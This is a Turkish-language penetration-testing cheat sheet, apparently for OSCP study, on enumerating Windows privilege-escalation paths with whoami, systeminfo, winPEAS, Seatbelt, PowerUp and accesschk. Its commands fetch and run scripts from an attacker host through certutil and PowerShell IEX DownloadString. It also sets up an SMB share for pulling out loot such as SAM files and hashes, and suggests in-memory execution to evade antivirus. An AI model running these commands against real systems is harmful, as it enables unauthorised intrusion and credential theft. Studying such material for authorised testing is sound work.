Windows Privilege Escalation — Enumeration Methodology (winPEAS, Seatbelt, PowerUp, accesschk)
Ilk shell alindiktan sonra Windows uzerinde yetki yukseltme yollarini sistematik bulmak icin manuel komutlar (whoami /priv, whoami /all, systeminfo) ve otomatik araclarin (winPEAS, Seatbelt, PowerUp, accesschk, SharpUp) tam akisi. Tum diger privesc tekniklerinin giris noktasidir.
- Hedef Windows uzerinde calisan bir shell (reverse shell, evil-winrm, RDP veya psexec)
- Kali tarafinda araclari serve etmek icin HTTP/SMB sunucusu
Komutlar
whoami /priv whoami /all systeminfo [System.Environment]::OSVersion.Version; (Get-CimInstance Win32_OperatingSystem).Caption; Get-HotFix | Sort-Object InstalledOn -Descending | Select-Object -First 15 certutil.exe -urlcache -split -f http://{{LHOST}}:{{LPORT}}/winPEASx64.exe C:\Windows\Temp\winpeas.exe C:\Windows\Temp\winpeas.exe quiet cmd fast IEX(New-Object Net.WebClient).DownloadString('http://{{LHOST}}:{{LPORT}}/winPEAS.ps1') IEX(New-Object Net.WebClient).DownloadString('http://{{LHOST}}:{{LPORT}}/PowerUp.ps1'); Invoke-AllChecks C:\Windows\Temp\Seatbelt.exe -group=all accesschk.exe /accepteula -uwcqv "Users" * accesschk.exe /accepteula -wvu "Everyone" "C:\Program Files\VulnApp" reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated & reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated impacket-smbserver share $(pwd) -smb2support Amac
Windows privesc’in temeli sistematik enumeration’dir. Once manuel hizli kontroller (token, gruplar, OS surumu), sonra otomatik araclar (winPEAS, Seatbelt, PowerUp). Bu sayfa diger tum privesc tekniklerinin baslangic noktasidir; her bulguyu ilgili ozel tekniğe baglayin.
Manuel Hizli Triage
Ilk shell’de su sirayla bakin:
- Token ayricaliklari —
whoami /priv. SeImpersonate veya SeAssignPrimaryToken varsa direkt Potato ailesine (win-seimpersonate-potato) gidin; SeDebug/SeBackup/SeRestore/SeLoadDriver da yuksek deger. - Kimlik ve gruplar —
whoami /all. Backup Operators / Server Operators / DnsAdmins gibi gruplar ayri yollar acar. - OS ve yamalar —
systeminfoveya PowerShellGet-HotFix. Build numarasi hem kernel exploit hem de dogru Potato secimi icin gerekli.
Otomatik Araclar
winPEAS en kapsamli tek-tikla aractir; kirmizi vurgular en kritik bulgulardir. Disk’e yazmadan PowerShell surumunu (winPEAS.ps1) bellekte calistirmak AV/disk forensics acisindan daha temizdir.
Seatbelt (GhostPack, C#) — -group=all ile host’un guvenlik konfigurasyonunu cikarir; ozellikle AutoLogon, stored credentials ve UAC seviyesinde guclu.
PowerUp (Invoke-AllChecks) — servis odakli privesc’lerde (unquoted service path, modifiable service, AlwaysInstallElevated) cok hizli sonuc verir ve cogu zaman dogrudan Write-ServiceBinary / Install-ServiceBinary exploit fonksiyonlarini da sunar.
accesschk (Sysinternals) — manuel dogrulama icin sart. winPEAS bir servisi ‘modifiable’ diye isaretledi ise, accesschk ile (-uwcqv "Users" *) hangi yetkilerin (SERVICE_CHANGE_CONFIG, WRITE_DAC) gercekten oldugunu teyit edin. Eski accesschk surumlerinde -accepteula gerekir.
Arac Transferi
Araclari hedefe tasimak icin Kali’de python3 -m http.server {{LPORT}} veya impacket-smbserver calistirip hedefte certutil, PowerShell DownloadString veya SMB ile cekin. Loot’u (SAM, config, hash) geri tasimak icin ayni SMB paylasimini kullanin.
Notlar
- Otomatik arac calistirmadan once manuel token kontrolu yapin; cogu servis hesabi (IIS, MSSQL) zaten SeImpersonate tasir ve enumeration’a vakit harcamadan Potato calisir.
- AV ortaminda winPEAS.exe yakalanabilir;
.ps1surumu, obfuscation veya parcali manuel kontroller alternatiftir. - Bulgulari dogrula → exploit et disiplini OSCP’de hayati: accesschk/sc qc ciktisini exploit oncesi ekran goruntusu/log olarak saklayin.